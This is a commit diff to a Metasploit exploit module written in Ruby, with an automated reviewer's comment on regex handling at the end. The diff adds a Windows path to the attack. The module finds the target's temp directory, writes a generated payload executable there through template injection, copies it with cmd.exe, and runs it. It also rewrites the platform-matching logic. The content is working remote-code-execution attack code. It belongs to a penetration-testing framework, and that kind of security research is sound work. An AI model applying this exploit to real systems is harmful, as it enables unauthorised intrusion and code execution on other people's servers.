Support Win/Linx/Java payloads for Win/Linux platforms
parent
83824b2902
commit
f33e63c16f
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def do_explicit_check
|
def do_explicit_check
|
||||||
begin
|
begin
|
||||||
cookie = do_login
|
cookie = do_login
|
||||||
# I don't really care which command to execute, as long as it's a valid one.
|
# I don't really care which command to execute, as long as it's a valid one for both platforms.
|
||||||
# If the command is valid, it should return {"message"=>"0"}.
|
# If the command is valid, it should return {"message"=>"0"}.
|
||||||
# If the command is not valid, it should return an empty hash.
|
# If the command is not valid, it should return an empty hash.
|
||||||
c = get_exec_code('whoami')
|
c = get_exec_code('whoami')
|
||||||
|
@ -382,7 +382,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# @param new_fname [String] The new file
|
# @param new_fname [String] The new file
|
||||||
# @return [String]
|
# @return [String]
|
||||||
def get_dup_file_code(fname, new_fname)
|
def get_dup_file_code(fname, new_fname)
|
||||||
get_exec_code("cp #{fname} #{new_fname}")
|
if fname =~ /^\/[[:print:]]+/
|
||||||
|
cp_cmd = "cp #{fname} #{new_fname}"
|
||||||
|
else
|
||||||
|
cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
|
||||||
|
end
|
||||||
|
|
||||||
|
get_exec_code(cp_cmd)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -431,7 +437,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def target_platform_compat?(target_platform)
|
def target_platform_compat?(target_platform)
|
||||||
target.platform.names.grep(/#{target_platform}|java/i).empty? ? false : true
|
target.platform.names.each do |n|
|
||||||
|
if /^java$/i === n || /#{n}/i === target_platform
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -452,11 +464,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
c = get_temp_path_code
|
c = get_temp_path_code
|
||||||
res = inject_template(c, cookie)
|
res = inject_template(c, cookie)
|
||||||
json = res.get_json_document
|
json = res.get_json_document
|
||||||
if json['message']
|
json['message'] || ''
|
||||||
return json['message']
|
|
||||||
end
|
|
||||||
|
|
||||||
''
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_java_home_path(cookie)
|
def get_java_home_path(cookie)
|
||||||
|
@ -496,6 +504,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit_as_windows(cookie)
|
def exploit_as_windows(cookie)
|
||||||
|
tmp_path = get_tmp_path(cookie)
|
||||||
|
|
||||||
|
if tmp_path.blank?
|
||||||
|
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||||
|
end
|
||||||
|
|
||||||
|
exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
|
||||||
|
exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
|
||||||
|
exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
|
||||||
|
exe_fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||||
|
exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||||
|
register_files_for_cleanup(exe_fname, exe_new_fname)
|
||||||
|
|
||||||
|
print_status("Attempting to write #{exe_fname}")
|
||||||
|
c = get_write_file_code(exe_fname, exe)
|
||||||
|
inject_template(c, cookie)
|
||||||
|
|
||||||
|
print_status("New file will be #{exe_new_fname}")
|
||||||
|
c = get_dup_file_code(exe_fname, exe_new_fname)
|
||||||
|
inject_template(c, cookie)
|
||||||
|
|
||||||
|
print_status("Executing #{exe_new_fname}")
|
||||||
|
c = get_exec_code(exe_new_fname)
|
||||||
|
inject_template(c, cookie)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -542,7 +574,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_status("Target being detected as: #{target_platform}")
|
print_status("Target being detected as: #{target_platform}")
|
||||||
|
|
||||||
unless target_platform_compat?(target_platform)
|
unless target_platform_compat?(target_platform)
|
||||||
fail_with(Failure::BadConfig, 'Selected target does not match the target.')
|
fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
|
||||||
end
|
end
|
||||||
|
|
||||||
case target.name
|
case target.name
|
||||||
|
|
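Review bot: In `target_platform_compat?` (the third hunk, fully visible here), the new test `/#{n}/i === target_platform` interpolates the platform name into a regex without escaping or anchoring, so the guard that aborts on a mismatched target becomes a loose substring match whose meaning changes if a name ever contains a regex metacharacter. The page does not show what `target_platform` looks like, so if a substring match is intended, keep it but write `target_platform =~ /#{Regexp.escape(n)}/i`. The Java test `/^java$/i` should use `\A`/`\z`, because `^`/`$` match per line. The `each` loop with `return true` and a trailing `false` reads more directly as `target.platform.names.any? { |n| n =~ /\Ajava\z/i || target_platform =~ /#{Regexp.escape(n)}/i }`, which also avoids calling `===` directly.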